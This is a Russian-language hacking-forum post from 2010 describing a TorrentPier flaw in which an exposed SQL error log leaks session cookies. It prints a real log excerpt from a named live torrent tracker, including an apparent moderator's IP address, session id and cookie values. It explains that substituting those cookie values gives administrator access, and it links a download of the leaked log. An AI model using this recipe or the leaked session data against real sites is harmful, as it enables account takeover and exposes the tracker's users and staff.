ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Уязвимость TorrentPier
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимость TorrentPier
  #1  
Старый 14.01.2010, 02:45
Аватар для PROtS
PROtS
Новичок
Регистрация: 30.06.2008
Сообщений: 4
Провел на форуме:
14771

Репутация: 24
Exclamation Уязвимость TorrentPier
Данная Уязвимость позволяет получить доступ к практически любой учетной записи пользователя.

Суть: Подмена Cookie Информации

Опасность: ВЫСОКАЯ

Уязвимость находится в данном файле http://Имя_Хоста/forum/log/sql_error_bb.log

Вот фрагмент файла, взятого с известного трекера http://pirat.ca/

Код:
Source  : includes/functions_group.php(220)
IP      : 78.37.2.16
Date    : 2009-12-17 14:32:14
Agent   : Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729)
Req_URI : /forum/admin/admin_forums.php
Referer : http://pirat.ca/forum/admin/admin_forums.php?mode=deleteforum&f=679
Method  : POST
PID     : 27739
Request : Array
(
    [mode] => movedelforum
    [from_id] => 679
    [sid] => 6JqZF1CwFgqsJfJwTlRH
    [to_id] => -1
    [submit] => Перенести и удалить
    [bb_data] => a:3:{s:2:"uk";s:12:"OdlHLUTBfjm0";s:3:"uid";i:80;s:3:"sid";s:20:"6JqZF1CwFgqsJfJwTlRH";}
    [bb_t] => a:2:{i:49976;i:1261047727;i:50621;i:1261032130;}
    [__utma] => 6183090.301573379111072060.1247143023.1261024234.1261048248.89
    [__utmz] => 6183090.1247143023.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    [MG_735] => 12
    [MG_2719] => 12
    [MG_8419] => 12
    [hotlog] => 1
    [__utmb] => 6183090.32.10.1261048248
    [__utmc] => 6183090
)______________________________________________________________________________
Из этого лога нам интересны следующие данные:

Referer: Как мы видим, по это один из модераторов или администраторов трекера, судя по ссылке.

[bb_data] Это содержимое cookie файла жертвы.

Подмен данных, и вот мы уже члены администрации)

Ниже предоставляю оригинал файла, слитый 2 дня назад. На сегодняшний день, они додумались заблокировать каталог))

http://www.bmail.ru/~prots@bmail.ru/sql_error_bb%20(1).log.7z
Последний раз редактировалось PROtS; 14.01.2010 в 03:00..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Microsoft устранит уязвимость DirectX Elfman Мировые новости 1 12.07.2009 19:08
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости 17 12.12.2006 13:15
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов k00p3r Чужие Статьи 1 11.07.2005 19:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ